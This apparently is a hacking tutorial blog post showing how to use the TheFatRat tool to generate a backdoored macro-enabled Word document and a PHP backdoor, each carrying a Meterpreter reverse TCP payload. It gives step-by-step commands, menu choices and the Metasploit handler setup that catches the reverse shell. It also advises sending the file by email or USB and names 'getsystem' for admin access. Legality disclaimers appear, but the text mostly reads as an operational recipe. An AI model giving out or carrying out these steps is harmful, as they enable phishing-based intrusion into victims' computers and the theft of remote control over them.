How To Exploit Windows Systems with FATRAT & a .doc file

Microsoft office is by far the most used office tool for creating and editing .doc files. But is it as secure as everyone thinks or Can hackers hack and exploit Windows 10 with Microsoft Word (.doc file)?

I mean what can an innocent-looking .doc file do to exploit your system. Turns out quite a lot. In this tutorial we will show you how a malicious .doc file and compromise a windows system giving shell access to attackers on the internet.

Note: I have tested this exploit on office 2007, and it works perfectly. Higher versions not so much. Latest versions are safe from this exploit.

What is FATRAT Hacking tool?

FATRAT is a remote administration framework used for making rat applications and rat apk files with reverse shells which can be used for controlling devices remotely. By using FATRAT, we can hack any of the most used operating systems like windows, iOS, Android, and Mac. Today we will hack windows 10. So let’s hack windows with Microsoft office.

Hacking Windows with FATRAT and MS Office Exploit

Disclaimer:

Please be aware that exploiting or testing any device is illegal unless you have permission from the owner and the parties involved. This post should be used as a tool to help people understand how hackers can exploit windows 10 devices with .doc files and tools such as FATRAT. We shall not be held responsible if any criminal charges are brought against any person who misuses the information on this website to violate the law.

So let’s learn the steps to hack windows 10 with word files. So let’s start hacking.

Step 1: Open Kali terminal and clone FATRAT tool from Github

Git clone the following FATRAT repository from the Kali Linux terminal and run the following commands to setup FATRAT:

For cloning fatrat type

git clone https://github.com/Screetsec/TheFatRat.git

Then type cd TheFatRat

Step 2: Setup and give root and execution permissions

Give the FATRAT folder and the hacking script root permissions to compile and execute in Kali Linux. Use the following command:

chmod +x setup.sh

Step 3: Install FATRAT tool

Use the following command to start the installation of FATRAT in Kali Linux.

./setup.sh

Once fatrat is installed, you will see the following screen

Type y for yes so that you can run fatrat from any terminal.

CREATING MIRCOSOFT WORD EXPLOIT TO HACK WINDOWS

We will create a backdoor for office using Microsploit. To select this windows backdoor hack

Type 7

Now we will create a backdoor with word file and hack windows 10

Type 2         

Now that you have chosen the exploit to use for the backdoor.

You have to give the necessary options and information for hacking windows 10

Enter LHOST listener/attacker IP address.

Type 192.168.1.12

Type port 4444 or any port number.

Enter backdoor file name testingfile

Type 3 for using windows/meterpreter/reverse_tcp exploit.

Press enter to create a backdoor with the specified exploit.

After backdoor file is created, it will be saved in /home/user/Downloads/TheFatRat/output/testingfile.docm

You can send the backdoor file over mail or sending it via a USB drive might work as well.

Step 5: Metasploit setup

Start up a terminal and type the following command to start Metasploit.

# msfconsole

Now in the Metasploit console type the following commands

Use the below commands

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.182.136

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Note:

**lhost= YOUR IP address

**lport= 4444

Step 6: Exploit the target with the backdoor

Once the target clicks on the word file, the backdoor script will execute, and the meterpreter session will be opened in msfconsole, as shown below.

The above victim is using Windows 10 system with office 2007 installed.

Type the “help” or “?” command to see all the possible options you can use with on Metasploit for hacking windows system.

Still not satisfied? Let’s do one more with a slight twist.

How to hack a window 10 with a .doc file

Step 1: Startup fatrat

Here, we will create backdoor using PHP. Type 1

Create backdoor with msfvenom

Then type 12

FATRAT.PHP BACKDOOR

Step 2: Enter the required details to set up the target

Enter

LHOST 192.168.182.136

Then enter

port 4444

Type file name as textfile

As shown, the backdoor for hacking windows with doc file will be created.

Step 3: Metasploit setup

Open up a Linux terminal and type the following command to start Metasploit.

# msfconsole

Now in the Msfconsole enter the commands:

msf > use exploit/multi/handler

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.182.136

msf exploit(handler) > set lport 4444

msf exploit(handler) > exploit

Step 4: Exploit the victim

As the target victim opens the malicious doc file. The windows system will be hacked, and we will get a shell terminal with access to control the target system.

You will get a meterpreter shell on the Kali Linux terminal as shown below.

You have now successfully exploited and hacked a WINDOWS 10 device using a word file.

Type the “help” command to show all the possible options for exploitation.

e.g. getsystem command can get you admin access.

So, this is how hackers can exploit windows with Microsoft word & FATRAT tool.

Commonly asked questions about hacking windows with Word files:

Q1 Is hacking windows devices legal?

No, hacking windows devices is not legal. We do not support hacking or exploiting devices. This post is just to show how hackers can exploit windows 10 systems and devices by using word files.

Q2 The word files I made are detected as a virus by antivirus. Am I safe?

Do not worry, you are safe. The alert is because you made your own virus, which is hidden in the word file. The antivirus software might detect the virus. Which only means you have a great antivirus. Cheers and be glad.

Q3. How can I hack my friends/Spouses pc with this hack?

This hack is only for educational purposes, not for hacking people. We do not support any illegal hacking. Kindly refrain from such comments and requests. This tutorial is for educational purposes only.

Q4. Does it work on higher versions of Microsoft Word?

It works on some versions of Microsoft 2010. But after that, Microsoft has long since patched this exploit. So you are probably safe as long as you stay updated to the latest version.